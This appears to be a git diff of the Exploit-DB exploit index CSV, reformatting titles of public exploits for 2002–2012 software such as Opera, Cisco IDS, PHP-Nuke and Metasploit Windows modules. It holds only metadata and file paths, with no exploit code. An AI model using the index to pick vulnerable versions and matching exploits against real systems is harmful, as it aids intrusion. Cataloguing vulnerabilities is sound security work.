Vulnerability",2002-05-12,frog,php,webapps,0 21455,platforms/asp/webapps/21455.txt,"Hosting Controller 1.x DSNManager Directory Traversal Vulnerability",2002-05-17,hdlkha,asp,webapps,0 -21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 Arbitrary File Read Access Vulnerability",2002-05-17,"Andrew Lopacki",hardware,remote,0 +21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access Vulnerability",2002-05-17,"Andrew Lopacki",hardware,remote,0 21457,platforms/asp/webapps/21457.txt,"Hosting Controller 1.4 Import Root Directory Command Execution Vulnerability",2002-05-17,hdlkha,asp,webapps,0 21458,platforms/linux/local/21458.txt,"grsecurity Kernel Patch 1.9.4 Linux Kernel Memory Protection Weakness",2002-05-17,"Guillaume PELAT",linux,local,0 21459,platforms/php/webapps/21459.txt,"Phorum 3.3.2 a Remote Command Execution Vulnerability",2002-05-17,"markus arndt",php,webapps,0 @@ -18726,7 +18726,7 @@ id,file,description,date,author,platform,type,port 21480,platforms/cgi/webapps/21480.txt,"GNU Mailman 2.0.x Admin Login Cross-Site Scripting Vulnerability",2002-05-20,office,cgi,webapps,0 21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1-4 Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0 21482,platforms/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,linux,dos,0 -21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 Arbitrary File Disclosure Vulnerability",2002-05-27,"GreyMagic Software",windows,remote,0 +21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure Vulnerability",2002-05-27,"GreyMagic Software",windows,remote,0 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 Call Center Buffer Overflow Vulnerability",2002-05-27,bob,windows,remote,0 21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability",2002-05-27,"Next Generation Security",windows,remote,0 21486,platforms/php/webapps/21486.txt,"PHPBB2 Image Tag HTML Injection Vulnerability",2002-05-26,"Martijn Boerwinkel",php,webapps,0 @@ -18764,7 +18764,7 @@ id,file,description,date,author,platform,type,port 21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21520,platforms/linux/remote/21520.py,"QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 -21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 +21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 @@ -18881,8 +18881,8 @@ id,file,description,date,author,platform,type,port 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1,ms Internet Explorer 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0 21637,platforms/hardware/dos/21637.c,"Zyxel Prestige 642R Router Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability",2002-07-24,"Andreas Sandblad",multiple,remote,0 -21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0 -21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 Authentication Bypass Vulnerability",2002-07-24,pokley,php,webapps,0 +21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0 +21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass Vulnerability",2002-07-24,pokley,php,webapps,0 21641,platforms/cgi/remote/21641.txt,"GNU Mailman 2.0.x Subscribe Cross-Site Scripting Vulnerability",2002-07-24,office,cgi,remote,0 21642,platforms/cgi/remote/21642.txt,"GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting Vulnerability",2002-07-24,office,cgi,remote,0 21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 SMTP Response Buffer Overflow Vulnerability",2002-07-24,doe,windows,remote,0 @@ -18946,7 +18946,7 @@ id,file,description,date,author,platform,type,port 21703,platforms/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 - Java ICA Environment DoS",2002-08-11,"Tanin Ehrami",windows,dos,0 21704,platforms/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy Cross-Site Scripting Vulnerability",2002-08-12,"TAKAGI Hiromitsu",unix,remote,0 21705,platforms/windows/remote/21705.txt,"Microsoft Internet Explorer 6.0 File Attachment Script Execution Vulnerability",2002-08-13,http-equiv,windows,remote,0 -21706,platforms/linux/remote/21706.txt,"Red Hat Interchange 4.8.x Arbitrary File Read Vulnerability",2002-08-13,anonymous,linux,remote,0 +21706,platforms/linux/remote/21706.txt,"Red Hat Interchange 4.8.x - Arbitrary File Read Vulnerability",2002-08-13,anonymous,linux,remote,0 21707,platforms/windows/remote/21707.txt,"GoAhead WebServer 2.1 - Remote Arbitrary Command Execution Vulnerability",2002-08-14,anonymous,windows,remote,0 21708,platforms/php/webapps/21708.txt,"Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection Vulnerability",2002-08-14,"Matthew Murphy",php,webapps,0 21709,platforms/windows/remote/21709.pl,"MyWebServer 1.0.2 - Search Request Remote Buffer Overflow Vulnerability",2002-08-14,D4rkGr3y,windows,remote,0 @@ -19078,7 +19078,7 @@ id,file,description,date,author,platform,type,port 21839,platforms/windows/remote/21839.rb,"NTR ActiveX Control StopModule() Remote Code Execution",2012-10-10,metasploit,windows,remote,0 21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free Vulnerability (MS12-063)",2012-10-10,metasploit,windows,remote,0 21841,platforms/windows/remote/21841.rb,"NTR ActiveX Control Check() Method Buffer Overflow",2012-10-10,metasploit,windows,remote,0 -21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,metasploit,windows,remote,0 +21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,metasploit,windows,remote,0 21843,platforms/windows/local/21843.rb,"Windows Escalate UAC Execute RunAs",2012-10-10,metasploit,windows,local,0 21844,platforms/windows/local/21844.rb,"Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,metasploit,windows,local,0 21845,platforms/windows/local/21845.rb,"Windows Escalate UAC Protection Bypass",2012-10-10,metasploit,windows,local,0 @@ -19341,7 +19341,7 @@ id,file,description,date,author,platform,type,port 22110,platforms/php/webapps/22110.txt,"PHP-Nuke 6.0 Modules.PHP Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,webapps,0 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 Shadow File Disclosure Vulnerability",2002-12-22,"Victor Pereira",cgi,webapps,0 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 Information Disclosure Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0 -22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 Arbitrary File Deletion Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0 +22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0 22114,platforms/php/webapps/22114.txt,"PEEL 1.0 b Remote File Include Vulnerability",2002-12-31,frog,php,webapps,0 22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI",2003-01-02,frog,php,webapps,0 22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI",2003-01-02,frog,php,webapps,0 @@ -19402,7 +19402,7 @@ id,file,description,date,author,platform,type,port 22171,platforms/windows/remote/22171.txt,"Trend Micro OfficeScan 3.x CGI Directory Insufficient Permissions Vulnerability",2003-01-15,"Rod Boron",windows,remote,0 22172,platforms/windows/dos/22172.txt,"Trend Micro Virus Control System 1.8 - Denial of Service Vulnerability",2003-01-15,"Rod Boron",windows,dos,0 22173,platforms/windows/remote/22173.txt,"Trend Micro Virus Control System 1.8 Information Disclosure Vulnerability",2003-01-15,"Rod Boron",windows,remote,0 -22174,platforms/windows/remote/22174.txt,"Trend Micro ScanMail For Exchange 3.8 Authentication Bypass Vulnerability",2003-01-15,"Rod Boron",windows,remote,0 +22174,platforms/windows/remote/22174.txt,"Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass Vulnerability",2003-01-15,"Rod Boron",windows,remote,0 22175,platforms/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 HTML Injection Vulnerability",2003-01-15,"Cyberarmy Application",php,webapps,0 22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 help.php Cross-Site Scripting Vulnerability",2003-01-15,"Cyberarmy Application",php,webapps,0 22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 edit.php SQL Injection Vulnerability",2003-01-15,"Cyberarmy Application",php,webapps,0 @@ -19506,7 +19506,7 @@ id,file,description,date,author,platform,type,port 22277,platforms/php/webapps/22277.txt,"Nuked-Klan 1.3 - Remote Information Disclosure Vulnerability",2003-02-23,"gregory Le Bras",php,webapps,0 22278,platforms/linux/remote/22278.pl,"moxftp 2.2 Banner Parsing Buffer Overflow Vulnerability",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 22279,platforms/php/shellcode/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Include Vulnerability",2003-02-24,"Karol Wiesek",php,shellcode,0 -22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 Arbitrary Program Execution Vulnerability",2003-02-24,http-equiv,windows,remote,0 +22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution Vulnerability",2003-02-24,http-equiv,windows,remote,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 -dev sendphoto.php File Disclosure Vulnerability",2003-02-24,frog,php,webapps,0 22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 shownews.php Remote File Include Vulnerability",2003-02-25,Over_G,php,webapps,0 @@ -19716,7 +19716,7 @@ id,file,description,date,author,platform,type,port 22494,platforms/php/webapps/22494.txt,"OSCommerce 2.2 Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 Documentation Server Error Page Cross-Site Scripting Vulnerability",2003-04-15,euronymous,multiple,remote,0 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 Error Message Installation Path Disclosure Vulnerability",2003-04-11,"Dennis Rand",multiple,remote,0 -22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 Authentication Bypass Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22499,platforms/cgi/webapps/22499.pl,"IkonBoard 3.1 Lang Cookie Arbitrary Command Execution Vulnerability (1)",2003-04-15,"Nick Cleaton",cgi,webapps,0 22500,platforms/cgi/webapps/22500.pl,"IkonBoard 3.1 Lang Cookie Arbitrary Command Execution Vulnerability (2)",2003-05-05,snooq,cgi,webapps,0 22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution Vulnerability",2003-03-31,"DWC Gr0up",php,webapps,0 @@ -19729,9 +19729,9 @@ id,file,description,date,author,platform,type,port 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x Rejected Connection Memory Leakage Denial of Service Vulnerability",2003-04-18,"Steve Grubb",linux,dos,0 22509,platforms/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote,0 22511,platforms/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue Ext.DLL Command Execution Vulnerability",2003-04-20,"Matthew Murphy",windows,remote,0 -22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x Authorization Heap Overflow Vulnerability",2003-04-21,"Matthew Murphy",multiple,dos,0 +22512,platforms/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorization Heap Overflow Vulnerability",2003-04-21,"Matthew Murphy",multiple,dos,0 22513,platforms/asp/webapps/22513.txt,"MPCSoftWeb 1.0 Database Disclosure Vulnerability",2003-04-21,drG4njubas,asp,webapps,0 -22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x Authorization Format String Vulnerability",2003-04-21,"Matthew Murphy",multiple,dos,0 +22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String Vulnerability",2003-04-21,"Matthew Murphy",multiple,dos,0 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x Count.pl Directory Traversal Vulnerability",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service Vulnerability",2003-04-21,badpack3t,windows,dos,0 22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 Index.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 @@ -19764,7 +19764,7 @@ id,file,description,date,author,platform,type,port 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution Vulnerability",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 JavaScript Console Single Quote Attribute Injection Vulnerability",2003-04-28,nesumin,windows,remote,0 22547,platforms/php/webapps/22547.php,"Invision Power Board <= 3.3.4 unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 -22548,platforms/php/webapps/22548.txt,"Xivo 1.2 Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 +22548,platforms/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 Long File Name Remote Heap Corruption Vulnerability",2003-04-28,"imagine & nesumin",windows,dos,0 22551,platforms/windows/dos/22551.pl,"3D-FTP Client 4.0 - Buffer Overflow Vulnerability",2003-04-28,Over_G,windows,dos,0 @@ -19775,7 +19775,7 @@ id,file,description,date,author,platform,type,port 22556,platforms/windows/remote/22556.c,"MDG Web Server 4D 3.6 HTTP Command Buffer Overflow Vulnerability",2003-04-29,badpack3t,windows,remote,0 22557,platforms/php/webapps/22557.txt,"PHPNuke Splatt Forum 4.0 Module Cross-Site Scripting Vulnerability",2003-05-01,"Morning Wood",php,webapps,0 22558,platforms/php/webapps/22558.txt,"PHPNuke Splatt Forum 4.0 Module HTML Injection Vulnerability",2003-05-01,"Morning Wood",php,webapps,0 -22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 Arbitrary Command Execution Vulnerability",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 +22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution Vulnerability",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 22560,platforms/linux/dos/22560.txt,"KDE Konqueror 3.0.3 Malformed HTML Page Denial of Service Vulnerability",2003-05-02,Joachim_Strombergson,linux,dos,0 22561,platforms/hp-ux/dos/22561.txt,"HP-UX 11 RWrite Buffer Overflow Vulnerability",2003-05-02,bt@delfi.lt,hp-ux,dos,0 22562,platforms/windows/remote/22562.pl,"Microsoft IIS 5 User Existence Disclosure Vulnerability (1)",1999-02-24,JeiAr,windows,remote,0 @@ -19816,11 +19816,11 @@ id,file,description,date,author,platform,type,port 22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection Vulnerabilities",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 Private Message HTML Injection Vulnerability",2003-05-14,"Ferruh Mavituna",php,webapps,0 -22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 Authentication Bypass Vulnerability",2003-05-14,cdowns,php,webapps,0 +22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass Vulnerability",2003-05-14,cdowns,php,webapps,0 22601,platforms/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting Vulnerability",2003-05-14,"Hugo Vazquez",linux,remote,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 ICMP Flood Remote Denial of Service Vulnerability",2003-05-14,"Shaun Colley",palm_os,dos,0 22603,platforms/php/webapps/22603.txt,"PHP-Proxima autohtml.PHP Information Disclosure Vulnerability",2003-05-14,"Mind Warper",php,webapps,0 -22604,platforms/windows/remote/22604.txt,"ArGoSoft 1.8.x Authentication Bypass Vulnerability",2003-05-15,"Ziv Kamir",windows,remote,0 +22604,platforms/windows/remote/22604.txt,"ArGoSoft 1.8.x - Authentication Bypass Vulnerability",2003-05-15,"Ziv Kamir",windows,remote,0 22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 TUpdate.PHP SQL Injection Vulnerability",2003-05-15,frog,php,webapps,0 22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 Install.PHP Administrative Access Vulnerability",2003-05-15,frog,php,webapps,0 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 Index.PHP IMG Tag Cross-Site Scripting Vulnerability",2003-05-16,"Ferruh Mavituna",php,webapps,0 @@ -19847,7 +19847,7 @@ id,file,description,date,author,platform,type,port 22628,platforms/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution Vulnerability",2003-03-20,"Tomasz Grabowski",multiple,local,0 22629,platforms/osx/dos/22629.txt,"Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module Integer Overflow Vulnerability",2003-05-22,"Sir Mordred",osx,dos,0 22630,platforms/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling Vulnerability",2003-05-22,"Sir Mordred",osx,remote,0 -22631,platforms/windows/remote/22631.txt,"IISProtect 2.1/2.2 Authentication Bypass Vulnerability",2003-05-22,iDefense,windows,remote,0 +22631,platforms/windows/remote/22631.txt,"IISProtect 2.1/2.2 - Authentication Bypass Vulnerability",2003-05-22,iDefense,windows,remote,0 22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 Member.PHP Cross-Site Scripting Vulnerability",2003-06-22,"Marc Ruef",php,webapps,0 22633,platforms/linux/local/22633.c,"Polymorph 0.4 Filename Buffer Overflow Vulnerability",2003-05-22,demz,linux,local,0 22634,platforms/multiple/dos/22634.txt,"Nessus 2.0.x LibNASL Arbitrary Code Execution Vulnerability",2003-05-22,"Sir Mordred",multiple,dos,0 @@ -19891,7 +19891,7 @@ id,file,description,date,author,platform,type,port 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Include Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22673,platforms/asp/webapps/22673.txt,"Philboard 1.14 philboard_admin.ASP Authentication Bypass Vulnerability",2003-05-29,aresu@bosen.net,asp,webapps,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 Path Disclosure Vulnerability",2003-05-29,JeiAr,windows,remote,0 -22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x Authentication SQL Injection Vulnerability",2003-05-29,pokleyzz,php,webapps,0 +22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit",2012-11-13,"Ben Sheppard",windows,remote,0 @@ -19912,7 +19912,7 @@ id,file,description,date,author,platform,type,port 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 Resource Exhaustion Denial of Service Vulnerability",2003-05-30,"Luca Ercoli",windows,dos,0 22695,platforms/linux/local/22695.pl,"RedHat 9.0,Slackware 8.1 /bin/mail Carbon Copy Field Buffer Overrun Vulnerability",2003-05-30,mark@vulndev.org,linux,local,0 22696,platforms/php/remote/22696.txt,"PHP 4.x Transparent Session ID Cross-Site Scripting Vulnerability",2003-05-30,"Sverre H. Huseby",php,remote,0 -22697,platforms/asp/webapps/22697.asp,"iisCart2000 Arbitrary File Upload Vulnerability",2003-05-31,Bosen,asp,webapps,0 +22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload Vulnerability",2003-05-31,Bosen,asp,webapps,0 22698,platforms/asp/webapps/22698.pl,"WebCortex WebStores2000 SQL Injection Vulnerability",2003-05-31,Bosen,asp,webapps,0 22699,platforms/unix/remote/22699.c,"Mod_Gzip 1.3.x Debug Mode Vulnerabilities",2003-05-06,xCrZx,unix,remote,0 22700,platforms/linux/dos/22700.c,"MyServer 0.4.3 HTTP GET Argument Buffer Overflow Vulnerability",2003-09-08,badpack3t,linux,dos,0 @@ -19952,7 +19952,7 @@ id,file,description,date,author,platform,type,port 22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 %USERPROFILE% File Execution Weakness",2003-06-05,"Eiji James Yoshida",windows,remote,0 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (authbypass) Vulnerability",2012-11-15,d3b4g,php,webapps,0 -22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 auth.dll pa_modify_accounts() RCE",2012-11-15,rgod,windows,remote,0 +22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - auth.dll pa_modify_accounts() RCE",2012-11-15,rgod,windows,remote,0 22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() Perl Code Evaluation RCE",2012-11-15,rgod,windows,remote,0 22739,platforms/hardware/dos/22739.py,"Broadcom DoS on BCM4325 and BCM4329 Devices",2012-11-15,CoreLabs,hardware,dos,0 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0 @@ -20140,7 +20140,7 @@ id,file,description,date,author,platform,type,port 22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x (Direct Retn)",2012-11-26,Nezim,windows,local,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 22936,platforms/php/webapps/22936.txt,"SmartCMS (index.php, idx parameter) SQL Injection Vulnerability",2012-11-26,NoGe,php,webapps,0 -22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability",2012-11-26,LiquidWorm,php,webapps,0 +22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read Vulnerability",2012-11-26,LiquidWorm,php,webapps,0 22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow Vulnerability",2003-07-21,inv[at]dtors,unix,local,0 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 @@ -20259,7 +20259,7 @@ id,file,description,date,author,platform,type,port 23055,platforms/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta HTML Injection Vulnerability",2003-08-23,"Scott M",asp,webapps,0 23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service Attack",2003-08-25,"Luca Ercoli",windows,dos,0 23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Include Vulnerability",2003-08-25,Officerrr,php,webapps,0 -23058,platforms/php/webapps/23058.txt,"newsPHP 216 Authentication Bypass Vulnerability",2003-08-25,Officerrr,php,webapps,0 +23058,platforms/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass Vulnerability",2003-08-25,Officerrr,php,webapps,0 23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability",2003-08-25,"cyber talon",cgi,webapps,0 23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x Secure.PHP Unauthorized Access Vulnerability",2003-08-26,frog,php,webapps,0 23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x Pass_done.PHP Remote SQL Injection Vulnerability",2003-08-26,frog,php,webapps,0 @@ -20309,7 +20309,7 @@ id,file,description,date,author,platform,type,port 23106,platforms/php/webapps/23106.txt,"SchoolCMS Persistent XSS",2012-12-03,VipVince,php,webapps,0 23107,platforms/windows/dos/23107.txt,"Opera Web Browser 12.11 Crash PoC",2012-12-03,coolkaveh,windows,dos,0 23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - CSRF Vulnerability",2012-12-03,"Ben Williams",multiple,webapps,0 -23110,platforms/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 Arbitrary File Download",2012-12-03,"Ben Williams",linux,webapps,0 +23110,platforms/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download",2012-12-03,"Ben Williams",linux,webapps,0 23111,platforms/multiple/webapps/23111.txt,"FirePass SSL VPN Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",multiple,webapps,0 23112,platforms/linux/dos/23112.txt,"IBM DB2 db2dart Buffer Overflow Vulnerability",2003-09-18,"Martinez Kuhn",linux,dos,0 23113,platforms/windows/remote/23113.c,"Microsoft Exchange Server 4.0/5.0 SMTP HELO Argument Buffer Overflow Vulnerability",1998-03-10,Rootshell,windows,remote,0 @@ -20337,7 +20337,7 @@ id,file,description,date,author,platform,type,port 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability",2003-09-10,"Frank DENIS",linux,dos,0 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x cgi-lib.dll Remote Buffer Overflow Vulnerability",2003-09-12,Moran,windows,dos,0 -23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 Authentication SQL Injection Vulnerability",2003-09-12,frog,php,webapps,0 +23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authentication SQL Injection Vulnerability",2003-09-12,frog,php,webapps,0 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass Vulnerability",2003-09-15,Texonet,sco,local,0 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 HTTP Request Buffer Overflow Vulnerability",2003-09-15,"Bahaa Naamneh",multiple,dos,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation Vulnerability",2003-09-15,Texonet,sco,local,0 @@ -20361,7 +20361,7 @@ id,file,description,date,author,platform,type,port 23161,platforms/linux/remote/23161.c,"LSH 1.x - Remote Buffer Overflow Vulnerability (1)",2003-09-19,"Carl Livitt",linux,remote,0 